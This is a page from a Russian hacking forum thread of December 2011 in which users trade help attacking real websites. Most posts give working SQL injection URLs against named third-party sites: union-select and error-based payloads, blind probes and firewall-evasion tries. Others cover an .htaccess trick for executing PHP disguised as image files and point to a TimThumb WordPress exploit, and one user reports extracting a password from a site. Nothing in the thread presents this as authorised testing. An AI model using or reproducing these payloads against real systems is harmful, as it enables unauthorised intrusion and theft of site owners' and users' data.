Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 927 of 1207
  1. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Залил AddHandler application/x-httpd-php .php .html _php .png

    smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают
    При <files "smile.gif">
    AddType application/x-httpd-php .gif
    </files>
    Качает файл
     
    #18521 wkar, 4 Dec 2011
  2. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    wkar, бывает, что на некоторых серверах этот способ не могает...
     
    #18522 Ereee, 4 Dec 2011
    1 person likes this.
  3. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    union не нравится ему :rolleyes:
     
    #18523 shadowrun, 4 Dec 2011
    1 person likes this.
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Крути блиндом, по-другому не выйдет
    _http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1)=5+--+
     
    #18524 er9j6@, 4 Dec 2011
  5. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    195
    Likes Received:
    260
    Reputations:
    32
    Your request is blocking firewall on the server
    In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
     
    #18525 A_n_d_r_e_i, 4 Dec 2011
  6. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I need a solution to my problem here.

    Code:
    http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+select+1,2,3,4+--+
    It's showing this.

    The used SELECT statements have a different number of columns

    Any help please?
     
    #18526 lightangel, 5 Dec 2011
  7. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    lightangel
    http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10--
     
    #18527 Skofield, 5 Dec 2011
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,167
    Likes Received:
    617
    Reputations:
    690
    2lightangel http://forum.antichat.ru/thread43966.html ты уже ***
     
    _________________________
    #18528 shell_c0de, 5 Dec 2011
    5 people like this.
  9. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Товарищи! Нужна ваша помощь!
    короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
    подскажите вид уязвимости^^
    а далее сам чего нибудь накручу
    если не получится то конешно отдам вам на растерзание))
     
    #18529 stan0009, 5 Dec 2011
  10. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://forum.antichat.ru/thread12123-including.html
    http://forum.antichat.ru/thread232773.html
    но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.
     
    #18530 d1v, 5 Dec 2011
  11. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
    Shows "Unknown column '4' in 'order clause'

    Code:
    http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
    Showing
    406 Not Acceptable
    This request is not acceptable

    Also, another problem.

    Code:
    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
    Code:
    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
    Nothing works!
     
    #18531 lightangel, 5 Dec 2011
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version(),rand(0)|0)+%0A+having+%0A+min(0)--+


    http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(),rand(0)|0)+having+min(0)--+
     
    _________________________
    #18532 Konqi, 5 Dec 2011
    1 person likes this.
  13. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Что с этим можно сделать ?

    Code:
    http://???????.com/wp-content/themes/rttheme9/timthumb.php
     
    #18533 XAOCX, 6 Dec 2011
    Last edited: 6 Dec 2011
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Гуглится легко:
    http://forum.antichat.ru/showpost.php?p=2792868&postcount=170
     
    #18534 Ereee, 6 Dec 2011
    1 person likes this.
  15. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0

    Большое спасибо !
     
    #18535 XAOCX, 6 Dec 2011
  16. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Что-то не получается, прошу помощи

    Code:
    http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
     
    #18536 XAOCX, 6 Dec 2011
  17. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Это не уязвимость
     
    #18537 aydin-ka, 6 Dec 2011
    1 person likes this.
  18. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    А как же это ?


     
    #18538 XAOCX, 6 Dec 2011
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    нашел скулю на сайте и при выводе пароля пишет такую лабуду

    skankjo:�{�o��
    сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
    сам запрос
     
    #18539 heks, 6 Dec 2011
    Last edited: 6 Dec 2011
  20. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    195
    Likes Received:
    260
    Reputations:
    32
    Там /wp-content/plugins/module/
    а не /wp-content/themes/rttheme9/
    WordPress TimThumb Plugin
     
    #18540 A_n_d_r_e_i, 7 Dec 2011
(You must log in or sign up to post here.)
Page 927 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.